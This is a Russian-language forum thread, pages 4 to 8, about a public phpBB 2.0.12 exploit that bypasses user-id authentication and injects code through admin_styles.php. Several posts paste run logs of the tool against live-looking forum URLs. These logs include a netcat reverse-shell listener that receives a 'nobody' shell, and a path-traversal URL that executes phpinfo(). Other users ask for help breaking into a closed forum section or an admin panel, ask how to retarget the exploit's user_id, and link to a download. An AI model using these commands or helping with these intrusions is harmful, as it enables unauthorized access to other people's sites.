Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 4 5 6 7 8
RSS
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
 
Народ, читайте не последнее собщение темы, а всю тему!
 
Цитата
Barsik пишет:
phpbbexp.exe

C:\phpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperз ... 06bef5092f9d369f13107684f63a3499  http://site.com/phpbb2/?sid=06bef5092f9d369f13107684f63a3499
_ recuperation du nom de la table sql ... sempervi OK
_ Injection de la fake templates ...OK
_ Fichier crзe

C:\nc -lvvp 8888
listening on [any] 8888 ...
connect to [13.37.13.37] from site.com [0.6.6.6] 57532
id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

PS: nc - netcat net sniffer
 
пацаны помагите надо срочно попасть на форум в закрытый раздел по адрессу http://legacyofkain.ru/lexx/index.php  кто может помочь очень надо и срочно
 
А вот у меня нифига не выводит при запуске... Кто-ниб знает что делать в таком случае?
 
да сплойт однозначно рулит!
только чет нарудо понабежало много странного!
 
Цитата
петрасян пишет:
пацаны помагите надо срочно попасть на форум в закрытый раздел по адрессу http://legacyofkain.ru/lexx/index.php  кто может помочь очень надо и срочно
тут не клуб помощи а обсуждение сплойта+)
 
у мя ролик есть как правильно эту штуку юзать  [IMG]http://www.securitylab.ru/forum/smileys/smiley17.gif[/IMG]
 
вот как я делал

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\Documents and Settings\Admin gt;d:
D:\ gt;phpbb
phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port]
coded by Malloc(0) Wicked Attitude
phpbb  lt;= 2.0.12 uid vuln + admin_styles.php exploit
D:\ gt;phpbb.exe http://qwe.15ru.net/ 1 1
_ nom du  #099;ookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 4c5275deb1c0c1651efe70d9c44c8ec6
http://qwe.15ru.net/?sid=4c5275deb1c0c1651efe70d9c44c8ec6
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier crщe
_ Code executщ
http://qwe.15ru.net/admin/admin_styles.php?mode=addnew insta ll_to=../../../../..
/../../../../../../../../../../../../../../tmp nigga=phpinfo (); sid=4c5275deb1c0
c1651efe70d9c44c8ec6

D:\ gt;


ну вот. а в итоге получается, что, заходя на этот сайт я вижу

phpBB : Критическая ошибка

Could not query database for theme info

DEBUG MODE

SQL Error : 1146 Table 15ru771.phpbb_themes doesnt exist

.:. Любые попытки взлома форума преследуются по закону .:.
Сервис форумов .:. Платный хостинг .:. Знакомства

и по этой замудреной ссылке тож самое
получается, я их только ломаю
 
Не могу скомплить!! какието ошибки при компиляции с помощью lcc-win32. Есть у кого нить уже exe файл?
Заранее благодарен!
 
:help:
*путь* phpbbexp.exe http://****.h14.ru/forum/ 1 1
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... fbe9b024977071b64891488e3ac248a6
http://****.h14.ru/forum/?sid=fbe9b024977071b64891488e3ac248a6
_ recuperation du nom de la table sql ... can't find

Что не так? Почему "_ recuperation du nom de la table sql ... can't find" ?????
:(
 
Здравствуйте Всееее!
Почитал....
1. как юзать - это вижуль хак на http://musthave.ru
2) в этом вижуль ,  во время работы говориться ,
что обязательно надо убить все куки перед использованием
(иначе будет глючить ...................)

Всем спасибо ,удачи
2000beta :funny:  :D
 
помогите попасть в админку phpBB 2.0.8!!!  :help:
 
Если я правильно понял, данный эксплоит расчитан на форумы, где админский user_id=2. И при этом успешно работает, я проверял!
Вопрос к спецам: что именно нужно изменить в эксплойте, чтобы подменить куки админа с user_id=NN? Дело в том, что есть форумы, где user_id=2 имеют рядовые пользователи.
 
userid легко угадывается в тексте сплойта, вопрос в другом: если я поменял userid, где взять компилятор?
:help:
 
как узнать какой префикс используется в бд?
 
Народ!
Купил неткатовскую версию е-коммерс - это типа интернет-магазин.

кто может настроить за деньги выгрузку прайса из 1С обещанную производителем в три уровня, и поиск не тупой, который на страницу прайса отсылает, а не товар показывает и еще чтоб фотки товара были.

Месяц маюсь и начинал со стандарта! Есть спецы по неткату кроме рекламных?
ЛОХХ igor@artcraft.ru
 
блин киньте ссылку на сплоит кто нибудь плиз...
на этой http://www.xfocus.net/tools/200503/phpbbexp.rar не находит ошибка 404 :(
 
:o ЯкОоо Многоь миь харесваь
Страницы: Пред. 1 ... 4 5 6 7 8
Читают тему